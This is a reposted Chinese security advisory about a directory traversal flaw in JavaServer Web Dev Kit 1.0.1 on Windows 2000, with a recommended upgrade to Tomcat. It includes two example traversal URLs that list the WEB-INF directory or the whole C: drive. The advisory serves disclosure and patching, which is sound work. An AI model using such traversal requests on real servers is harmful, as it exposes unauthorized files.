帝国软件
  设为首页 加入收藏 关于我们
 
解密帝国网站管理系统
栏 目:
  
您的位置:首页 > 技术文档 > JAVA编程
JavaServer Web Dev Kit(JSWDK) for win2000 目录遍历漏洞
作者:未知 发布时间:2005-03-12 来源:JSP天空网
涉及程序:
JavaServer Web Dev Kit(JSWDK)
描述:
JavaServer Web Dev Kit(JSWDK) for win2000 目录遍历漏洞
详细:
发现装了 JavaServer Web Dev Kit(JSWDK)1.0.1 的 WINDOWS NT/2000 系统存在漏洞,
攻击者通过构造特殊的 URL 请求能访问未授权文件。
exploits:
http://localhost:8080/examples//WEB-INF/
会列出 /WEB-INF/ 目录 .
http://localhost:8080/../examples//WEB-INF/../../../../../
如果 JSWDK 被装在 c: ,此请求将会列出 c: 下所有目录和文件
受影响系统:
JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000
解决方案:
CNNS 建议您升级 JSWDK 版本
建议您升级到tomcat.
  
评论】【加入收藏夹】【 】【打印】【关闭
※ 相关链接
 ·简单介绍javabean 和 ejb 的区别  (2005-03-12)
 ·JavaBean用户化  (2005-03-12)
 ·JavaBean的属性  (2005-03-12)
 ·JavaBean的事件  (2005-03-12)
 ·JavaBeans教程  (2005-03-12)
 ·JavaServerPages白皮书  (2005-03-12)
 ·课程介绍(10): SL-315 Java Serv  (2005-03-12)
 ·Java/jsp 好的入门文章共赏  (2005-03-12)
 ·教你如何编写Java类  (2005-03-12)
 ·编写一个JAVA的队列类  (2005-03-12)

   栏目导行
  PHP编程
  ASP编程
  ASP.NET编程
  JAVA编程
   站点最新
·致合作伙伴的欢迎信
·媒体报道
·帝国软件合作伙伴计划协议
·DiscuzX2.5会员整合通行证发布
·帝国CMS 7.0版本功能建议收集
·帝国网站管理系统2012年授权购买说
·PHPWind8.7会员整合通行证发布
·[官方插件]帝国CMS-访问统计插件
·[官方插件]帝国CMS-sitemap插件
·[官方插件]帝国CMS内容页评论AJAX分
   类别最新
·谈谈JDBC
·JDBC专题介绍
·JDBC接口技术
·利用weblogic的POOL(连接池)连接
·Jsp中调用Oracle存储过程的小例子
·JSP数据库操作例程
·JSP数据库连接大全
·用连接池提高Servlet访问数据库的效
·一种简单JDBC连接池的实现
·数据库连接池Java实现小结
 
关于帝国 | 广告服务 | 联系我们 | 程序开发 | 网站地图 | 留言板 帝国网站管理系统